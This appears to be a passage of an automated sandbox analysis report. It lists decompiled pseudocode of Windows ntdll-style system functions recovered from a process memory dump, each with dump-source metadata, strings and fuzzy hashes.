            						_push(0);
            						_push(0x65);
            						_v20 = _t106;
            						E044B5720();
            						_t104 = _v28;
            						_t116 = _t116 + 0xc;
            						continue;
            					}
            				}
            			}


            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: RTL: Re-Waiting
            • API String ID: 0-316354757
            • Opcode ID: 9bf777e40fe76d8469b5340114d6df9696dcdeb8446ccea3294b54e16eb64a12
            • Instruction ID: aa92323e98f401393976cddce5f455dcabe446cf59e5b369ff86c25e9ae78ecb
            • Opcode Fuzzy Hash: 9bf777e40fe76d8469b5340114d6df9696dcdeb8446ccea3294b54e16eb64a12
            • Instruction Fuzzy Hash: 6B612070A00214ABEF31DF68C940BBBB7A1FB44328F5406ABD811973D1D7B4B906A791
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E044F0EA5(void* __ecx, void* __edx) {
            				signed int _v20;
            				char _v24;
            				intOrPtr _v28;
            				unsigned int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				char _v44;
            				intOrPtr _v64;
            				void* __ebx;
            				void* __edi;
            				signed int _t58;
            				unsigned int _t60;
            				intOrPtr _t62;
            				char* _t67;
            				char* _t69;
            				void* _t80;
            				void* _t83;
            				intOrPtr _t93;
            				intOrPtr _t115;
            				char _t117;
            				void* _t120;
            
            				_t83 = __edx;
            				_t117 = 0;
            				_t120 = __ecx;
            				_v44 = 0;
            				if(E044EFF69(__ecx,  &_v44,  &_v32) < 0) {
            					L24:
            					_t109 = _v44;
            					if(_v44 != 0) {
            						E044F1074(_t83, _t120, _t109, _t117, _t117);
            					}
            					L26:
            					return _t117;
            				}
            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
            				_t5 = _t83 + 1; // 0x1
            				_v36 = _t5 << 0xc;
            				_v40 = _t93;
            				_t58 =  *(_t93 + 0xc) & 0x40000000;
            				asm("sbb ebx, ebx");
            				_t83 = ( ~_t58 & 0x0000003c) + 4;
            				if(_t58 != 0) {
            					_push(0);
            					_push(0x14);
            					_push( &_v24);
            					_push(3);
            					_push(_t93);
            					_push(0xffffffff);
            					_t80 = E04469730();
            					_t115 = _v64;
            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
            						_push(_t93);
            						E044EA80D(_t115, 1, _v20, _t117);
            						_t83 = 4;
            					}
            				}
            				if(E044EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
            					goto L24;
            				}
            				_t60 = _v32;
            				_t97 = (_t60 != 0x100000) + 1;
            				_t83 = (_v44 -  *0x4518b04 >> 0x14) + (_v44 -  *0x4518b04 >> 0x14);
            				_v28 = (_t60 != 0x100000) + 1;
            				_t62 = _t83 + (_t60 >> 0x14) * 2;
            				_v40 = _t62;
            				if(_t83 >= _t62) {
            					L10:
            					asm("lock xadd [eax], ecx");
            					asm("lock xadd [eax], ecx");
            					if(E04447D50() == 0) {
            						_t67 = 0x7ffe0380;
            					} else {
            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
            					}
            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
            						E044E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
            					}
            					if(E04447D50() == 0) {
            						_t69 = 0x7ffe0388;
            					} else {
            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            					}
            					if( *_t69 != 0) {
            						E044DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
            					}
            					if(( *0x4518724 & 0x00000008) != 0) {
            						E044E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
            					}
            					_t117 = _v44;
            					goto L26;
            				}
            				while(E044F15B5(0x4518ae4, _t83, _t97, _t97) >= 0) {
            					_t97 = _v28;
            					_t83 = _t83 + 2;
            					if(_t83 < _v40) {
            						continue;
            					}
            					goto L10;
            				}
            				goto L24;
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: `
            • API String ID: 0-2679148245
            • Opcode ID: e9908ac1f3dce8b95ebf5edafc1e988f1560626dd3e7bc699b22524e11c14230
            • Instruction ID: 274def19c25fbc1e7f2aea8fa45b24b0914cfd78cc697dda52035676d4c2a665
            • Opcode Fuzzy Hash: e9908ac1f3dce8b95ebf5edafc1e988f1560626dd3e7bc699b22524e11c14230
            • Instruction Fuzzy Hash: A751AE702043419FEB24DF29D984B2BB7E5EBC4304F04492EFA8697692D670FC06CB62
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E0445F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char* _v20;
            				intOrPtr _v24;
            				char _v28;
            				intOrPtr _v32;
            				char _v36;
            				char _v44;
            				char _v52;
            				intOrPtr _v56;
            				char _v60;
            				intOrPtr _v72;
            				void* _t51;
            				void* _t58;
            				signed short _t82;
            				short _t84;
            				signed int _t91;
            				signed int _t100;
            				signed short* _t103;
            				void* _t108;
            				intOrPtr* _t109;
            
            				_t103 = __ecx;
            				_t82 = __edx;
            				_t51 = E04444120(0, __ecx, 0,  &_v52, 0, 0, 0);
            				if(_t51 >= 0) {
            					_push(0x21);
            					_push(3);
            					_v56 =  *0x7ffe02dc;
            					_v20 =  &_v52;
            					_push( &_v44);
            					_v28 = 0x18;
            					_push( &_v28);
            					_push(0x100020);
            					_v24 = 0;
            					_push( &_v60);
            					_v16 = 0x40;
            					_v12 = 0;
            					_v8 = 0;
            					_t58 = E04469830();
            					_t87 =  *[fs:0x30];
            					_t108 = _t58;
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
            					if(_t108 < 0) {
            						L11:
            						_t51 = _t108;
            					} else {
            						_push(4);
            						_push(8);
            						_push( &_v36);
            						_push( &_v44);
            						_push(_v60);
            						_t108 = E04469990();
            						if(_t108 < 0) {
            							L10:
            							_push(_v60);
            							E044695D0();
            							goto L11;
            						} else {
            							_t18 = _t82 + 0x18; // 0x172cd01a
            							_t109 = L04444620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
            							if(_t109 == 0) {
            								_t108 = 0xc0000017;
            								goto L10;
            							} else {
            								_t21 = _t109 + 0x18; // 0x18
            								 *((intOrPtr*)(_t109 + 4)) = _v60;
            								 *_t109 = 1;
            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
            								 *(_t109 + 0xe) = _t82;
            								 *((intOrPtr*)(_t109 + 8)) = _v56;
            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
            								_t29 =  &(_t103[2]); // 0x2000172c
            								E0446F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
            								 *((short*)(_t109 + 0xc)) =  *_t103;
            								_t91 =  *_t103 & 0x0000ffff;
            								_t34 =  &(_t103[2]); // 0x2000172c
            								_t100 = _t91 & 0xfffffffe;
            								_t84 = 0x5c;
            								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
            										_push(_v60);
            										E044695D0();
            										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
            										_t51 = 0xc0000106;
            									} else {
            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
            										goto L5;
            									}
            								} else {
            									L5:
            									 *_a4 = _t109;
            									_t51 = 0;
            								}
            							}
            						}
            					}
            				}
            				return _t51;
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction ID: 2b539e16fbc056f0e9b921fdf5656726c8932e3891a8558262d9c7bea1660408
            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
            • Instruction Fuzzy Hash: B3518E715047109FD720DF19C840A67BBF9FF88714F00892EF99597661E7B4E904CB92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E044A3540(intOrPtr _a4) {
            				signed int _v12;
            				intOrPtr _v88;
            				intOrPtr _v92;
            				char _v96;
            				char _v352;
            				char _v1072;
            				intOrPtr _v1140;
            				intOrPtr _v1148;
            				char _v1152;
            				char _v1156;
            				char _v1160;
            				char _v1164;
            				char _v1168;
            				char* _v1172;
            				short _v1174;
            				char _v1176;
            				char _v1180;
            				char _v1192;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				short _t41;
            				short _t42;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				signed int _t82;
            				void* _t83;
            
            				_v12 =  *0x451d360 ^ _t82;
            				_t41 = 0x14;
            				_v1176 = _t41;
            				_t42 = 0x16;
            				_v1174 = _t42;
            				_v1164 = 0x100;
            				_v1172 = L"BinaryHash";
            				_t81 = E04460BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
            				if(_t81 < 0) {
            					L11:
            					_t75 = _t81;
            					E044A3706(0, _t81, _t79, _t80);
            					L12:
            					if(_a4 != 0xc000047f) {
            						E0446FA60( &_v1152, 0, 0x50);
            						_v1152 = 0x60c201e;
            						_v1148 = 1;
            						_v1140 = E044A3540;
            						E0446FA60( &_v1072, 0, 0x2cc);
            						_push( &_v1072);
            						E0447DDD0( &_v1072, _t75, _t79, _t80, _t81);
            						E044B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
            						_push(_v1152);
            						_push(0xffffffff);
            						E044697C0();
            					}
            					return E0446B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
            				}
            				_t79 =  &_v352;
            				_t81 = E044A3971(0, _a4,  &_v352,  &_v1156);
            				if(_t81 < 0) {
            					goto L11;
            				}
            				_t75 = _v1156;
            				_t79 =  &_v1160;
            				_t81 = E044A3884(_v1156,  &_v1160,  &_v1168);
            				if(_t81 >= 0) {
            					_t80 = _v1160;
            					E0446FA60( &_v96, 0, 0x50);
            					_t83 = _t83 + 0xc;
            					_push( &_v1180);
            					_push(0x50);
            					_push( &_v96);
            					_push(2);
            					_push( &_v1176);
            					_push(_v1156);
            					_t81 = E04469650();
            					if(_t81 >= 0) {
            						if(_v92 != 3 || _v88 == 0) {
            							_t81 = 0xc000090b;
            						}
            						if(_t81 >= 0) {
            							_t75 = _a4;
            							_t79 =  &_v352;
            							E044A3787(_a4,  &_v352, _t80);
            						}
            					}
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
            				}
            				_push(_v1156);
            				E044695D0();
            				if(_t81 >= 0) {
            					goto L12;
            				} else {
            					goto L11;
            				}
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID: BinaryHash
            • API String ID: 2994545307-2202222882
            • Opcode ID: 75b69c4bc150be25e15b92e40504d9c11951bf47852ce6930fb6d39b122a950c
            • Instruction ID: 7bceda9795bca22d3f5b92d7d86519ee759b5abbf39e3815154a4eed917f3ef3
            • Opcode Fuzzy Hash: 75b69c4bc150be25e15b92e40504d9c11951bf47852ce6930fb6d39b122a950c
            • Instruction Fuzzy Hash: 1B4138F1D0052C9BEF21DE51CC80FDEB77C9B54718F00459AEA09A7241EB30AE988F95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E044A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
            				char _v8;
            				intOrPtr _v12;
            				intOrPtr* _v16;
            				char* _v20;
            				short _v22;
            				char _v24;
            				intOrPtr _t38;
            				short _t40;
            				short _t41;
            				void* _t44;
            				intOrPtr _t47;
            				void* _t48;
            
            				_v16 = __edx;
            				_t40 = 0x14;
            				_v24 = _t40;
            				_t41 = 0x16;
            				_v22 = _t41;
            				_t38 = 0;
            				_v12 = __ecx;
            				_push( &_v8);
            				_push(0);
            				_push(0);
            				_push(2);
            				_t43 =  &_v24;
            				_v20 = L"BinaryName";
            				_push( &_v24);
            				_push(__ecx);
            				_t47 = 0;
            				_t48 = E04469650();
            				if(_t48 >= 0) {
            					_t48 = 0xc000090b;
            				}
            				if(_t48 != 0xc0000023) {
            					_t44 = 0;
            					L13:
            					if(_t48 < 0) {
            						L16:
            						if(_t47 != 0) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
            						}
            						L18:
            						return _t48;
            					}
            					 *_v16 = _t38;
            					 *_a4 = _t47;
            					goto L18;
            				}
            				_t47 = L04444620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
            				if(_t47 != 0) {
            					_push( &_v8);
            					_push(_v8);
            					_push(_t47);
            					_push(2);
            					_push( &_v24);
            					_push(_v12);
            					_t48 = E04469650();
            					if(_t48 < 0) {
            						_t44 = 0;
            						goto L16;
            					}
            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
            						_t48 = 0xc000090b;
            					}
            					_t44 = 0;
            					if(_t48 < 0) {
            						goto L16;
            					} else {
            						_t17 = _t47 + 0xc; // 0xc
            						_t38 = _t17;
            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
            							_t48 = 0xc000090b;
            						}
            						goto L13;
            					}
            				}
            				_t48 = _t48 + 0xfffffff4;
            				goto L18;
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID: BinaryName
            • API String ID: 2994545307-215506332
            • Opcode ID: 0db4d5a707f77e8584039460b9ee794db803a5743db052f00ed40406963597c5
            • Instruction ID: e2ccf308a294dabcfd6a980ae52e81ddfa0c668ee02a6ef65278bcc8d58c02ad
            • Opcode Fuzzy Hash: 0db4d5a707f77e8584039460b9ee794db803a5743db052f00ed40406963597c5
            • Instruction Fuzzy Hash: B5313332900609AFEF25DE59C945E6BF7B8EB90B20F01412AEC04A7780E730BE14C7A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 33%
            			E0445D294(void* __ecx, char __edx, void* __eflags) {
            				signed int _v8;
            				char _v52;
            				signed int _v56;
            				signed int _v60;
            				intOrPtr _v64;
            				char* _v68;
            				intOrPtr _v72;
            				char _v76;
            				signed int _v84;
            				intOrPtr _v88;
            				char _v92;
            				intOrPtr _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v105;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t35;
            				char _t38;
            				signed int _t40;
            				signed int _t44;
            				signed int _t52;
            				void* _t53;
            				void* _t55;
            				void* _t61;
            				intOrPtr _t62;
            				void* _t64;
            				signed int _t65;
            				signed int _t66;
            
            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
            				_v8 =  *0x451d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
            				_v105 = __edx;
            				_push( &_v92);
            				_t52 = 0;
            				_push(0);
            				_push(0);
            				_push( &_v104);
            				_push(0);
            				_t59 = __ecx;
            				_t55 = 2;
            				if(E04444120(_t55, __ecx) < 0) {
            					_t35 = 0;
            					L8:
            					_pop(_t61);
            					_pop(_t64);
            					_pop(_t53);
            					return E0446B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
            				}
            				_v96 = _v100;
            				_t38 = _v92;
            				if(_t38 != 0) {
            					_v104 = _t38;
            					_v100 = _v88;
            					_t40 = _v84;
            				} else {
            					_t40 = 0;
            				}
            				_v72 = _t40;
            				_v68 =  &_v104;
            				_push( &_v52);
            				_v76 = 0x18;
            				_push( &_v76);
            				_v64 = 0x40;
            				_v60 = _t52;
            				_v56 = _t52;
            				_t44 = E044698D0();
            				_t62 = _v88;
            				_t65 = _t44;
            				if(_t62 != 0) {
            					asm("lock xadd [edi], eax");
            					if((_t44 | 0xffffffff) != 0) {
            						goto L4;
            					}
            					_push( *((intOrPtr*)(_t62 + 4)));
            					E044695D0();
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
            					goto L4;
            				} else {
            					L4:
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
            					if(_t65 >= 0) {
            						_t52 = 1;
            					} else {
            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
            						}
            					}
            					_t35 = _t52;
            					goto L8;
            				}
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 9237b2aa5772890ebac141b88264088ffca9b1f97b70000f1e7ddb02eb2bbe93
            • Instruction ID: 035b73b8cb2ce813e3dbf7bbfe95e45b1246bf541dd816101844798a38b2b831
            • Opcode Fuzzy Hash: 9237b2aa5772890ebac141b88264088ffca9b1f97b70000f1e7ddb02eb2bbe93
            • Instruction Fuzzy Hash: 1931A4B19093059FDF20DF29C88095BBBE8EF85654F00492FF99593221EA38ED05DB93
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E04431B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
            				intOrPtr _v8;
            				char _v16;
            				intOrPtr* _t26;
            				intOrPtr _t29;
            				void* _t30;
            				signed int _t31;
            
            				_t27 = __ecx;
            				_t29 = __edx;
            				_t31 = 0;
            				_v8 = __edx;
            				if(__edx == 0) {
            					L18:
            					_t30 = 0xc000000d;
            					goto L12;
            				} else {
            					_t26 = _a4;
            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
            						goto L18;
            					} else {
            						E0446BB40(__ecx,  &_v16, __ecx);
            						_push(_t26);
            						_push(0);
            						_push(0);
            						_push(_t29);
            						_push( &_v16);
            						_t30 = E0446A9B0();
            						if(_t30 >= 0) {
            							_t19 =  *_t26;
            							if( *_t26 != 0) {
            								goto L7;
            							} else {
            								 *_a8 =  *_a8 & 0;
            							}
            						} else {
            							if(_t30 != 0xc0000023) {
            								L9:
            								_push(_t26);
            								_push( *_t26);
            								_push(_t31);
            								_push(_v8);
            								_push( &_v16);
            								_t30 = E0446A9B0();
            								if(_t30 < 0) {
            									L12:
            									if(_t31 != 0) {
            										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
            									}
            								} else {
            									 *_a8 = _t31;
            								}
            							} else {
            								_t19 =  *_t26;
            								if( *_t26 == 0) {
            									_t31 = 0;
            								} else {
            									L7:
            									_t31 = L04444620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
            								}
            								if(_t31 == 0) {
            									_t30 = 0xc0000017;
            								} else {
            									goto L9;
            								}
            							}
            						}
            					}
            				}
            				return _t30;
            			}

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: WindowsExcludedProcs
            • API String ID: 0-3583428290
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E044D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
            				intOrPtr _t35;
            				void* _t41;
            
            				_t40 = __esi;
            				_t39 = __edi;
            				_t38 = __edx;
            				_t35 = __ecx;
            				_t34 = __ebx;
            				_push(0x74);
            				_push(0x4500d50);
            				E0447D0E8(__ebx, __edi, __esi);
            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
            					E044B5720(0x65, 0, "Critical error detected %lx\n", _t35);
            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
            						asm("int3");
            						 *(_t41 - 4) = 0xfffffffe;
            					}
            				}
            				 *(_t41 - 4) = 1;
            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
            				 *((intOrPtr*)(_t41 - 0x64)) = L0447DEF0;
            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
            				_push(_t41 - 0x70);
            				L0447DEF0(1, _t38);
            				 *(_t41 - 4) = 0xfffffffe;
            				return E0447D130(_t34, _t39, _t40);
            			}

            Strings
            • Critical error detected %lx, xrefs: 044D8E21
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: Critical error detected %lx
            • API String ID: 0-802127002
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 044BFF60
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
            • API String ID: 0-1911121157
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E044F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
            				signed int _t296;
            				signed char _t298;
            				signed int _t301;
            				signed int _t306;
            				signed int _t310;
            				signed char _t311;
            				intOrPtr _t312;
            				signed int _t313;
            				void* _t327;
            				signed int _t328;
            				intOrPtr _t329;
            				intOrPtr _t333;
            				signed char _t334;
            				signed int _t336;
            				void* _t339;
            				signed int _t340;
            				signed int _t356;
            				signed int _t362;
            				short _t367;
            				short _t368;
            				short _t373;
            				signed int _t380;
            				void* _t382;
            				short _t385;
            				signed short _t392;
            				signed char _t393;
            				signed int _t395;
            				signed char _t397;
            				signed int _t398;
            				signed short _t402;
            				void* _t406;
            				signed int _t412;
            				signed char _t414;
            				signed short _t416;
            				signed int _t421;
            				signed char _t427;
            				intOrPtr _t434;
            				signed char _t435;
            				signed int _t436;
            				signed int _t442;
            				signed int _t446;
            				signed int _t447;
            				signed int _t451;
            				signed int _t453;
            				signed int _t454;
            				signed int _t455;
            				intOrPtr _t456;
            				intOrPtr* _t457;
            				short _t458;
            				signed short _t462;
            				signed int _t469;
            				intOrPtr* _t474;
            				signed int _t475;
            				signed int _t479;
            				signed int _t480;
            				signed int _t481;
            				short _t485;
            				signed int _t491;
            				signed int* _t494;
            				signed int _t498;
            				signed int _t505;
            				intOrPtr _t506;
            				signed short _t508;
            				signed int _t511;
            				void* _t517;
            				signed int _t519;
            				signed int _t522;
            				void* _t523;
            				signed int _t524;
            				void* _t528;
            				signed int _t529;
            
            				_push(0xd4);
            				_push(0x4501178);
            				E0447D0E8(__ebx, __edi, __esi);
            				_t494 = __edx;
            				 *(_t528 - 0xcc) = __edx;
            				_t511 = __ecx;
            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
            				 *(_t528 - 0xbc) = __ecx;
            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
            				_t427 = 0;
            				 *(_t528 - 0x74) = 0;
            				 *(_t528 - 0x9c) = 0;
            				 *(_t528 - 0x84) = 0;
            				 *(_t528 - 0xac) = 0;
            				 *(_t528 - 0x88) = 0;
            				 *(_t528 - 0xa8) = 0;
            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
            				if( *(_t528 + 0x1c) <= 0x80) {
            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
            					if(__eflags != 0) {
            						_t421 = E044F4C56(0, __edx, __ecx, __eflags);
            						__eflags = _t421;
            						if(_t421 != 0) {
            							 *((intOrPtr*)(_t528 - 4)) = 0;
            							E0446D000(0x410);
            							 *(_t528 - 0x18) = _t529;
            							 *(_t528 - 0x9c) = _t529;
            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
            							E044F5542(_t528 - 0x9c, _t528 - 0x84);
            						}
            					}
            					_t435 = _t427;
            					 *(_t528 - 0xd0) = _t435;
            					_t474 = _t511 + 0x65;
            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
            					_t511 = 0x18;
            					while(1) {
            						 *(_t528 - 0xa0) = _t427;
            						 *(_t528 - 0xbc) = _t427;
            						 *(_t528 - 0x80) = _t427;
            						 *(_t528 - 0x78) = 0x50;
            						 *(_t528 - 0x79) = _t427;
            						 *(_t528 - 0x7a) = _t427;
            						 *(_t528 - 0x8c) = _t427;
            						 *(_t528 - 0x98) = _t427;
            						 *(_t528 - 0x90) = _t427;
            						 *(_t528 - 0xb0) = _t427;
            						 *(_t528 - 0xb8) = _t427;
            						_t296 = 1 << _t435;
            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
            						__eflags = _t436 & _t296;
            						if((_t436 & _t296) != 0) {
            							goto L92;
            						}
            						__eflags =  *((char*)(_t474 - 1));
            						if( *((char*)(_t474 - 1)) == 0) {
            							goto L92;
            						}
            						_t301 =  *_t474;
            						__eflags = _t494[1] - _t301;
            						if(_t494[1] <= _t301) {
            							L10:
            							__eflags =  *(_t474 - 5) & 0x00000040;
            							if(( *(_t474 - 5) & 0x00000040) == 0) {
            								L12:
            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
            									goto L92;
            								}
            								_t442 =  *(_t474 - 0x11) & _t494[3];
            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
            									goto L92;
            								}
            								__eflags = _t442 -  *(_t474 - 0x11);
            								if(_t442 !=  *(_t474 - 0x11)) {
            									goto L92;
            								}
            								L15:
            								_t306 =  *(_t474 + 1) & 0x000000ff;
            								 *(_t528 - 0xc0) = _t306;
            								 *(_t528 - 0xa4) = _t306;
            								__eflags =  *0x45160e8;
            								if( *0x45160e8 != 0) {
            									__eflags = _t306 - 0x40;
            									if(_t306 < 0x40) {
            										L20:
            										asm("lock inc dword [eax]");
            										_t310 =  *0x45160e8; // 0x0
            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
            										__eflags = _t311 & 0x00000001;
            										if((_t311 & 0x00000001) == 0) {
            											 *(_t528 - 0xa0) = _t311;
            											_t475 = _t427;
            											 *(_t528 - 0x74) = _t427;
            											__eflags = _t475;
            											if(_t475 != 0) {
            												L91:
            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
            												goto L92;
            											}
            											asm("sbb edi, edi");
            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
            											_t511 = _t498;
            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
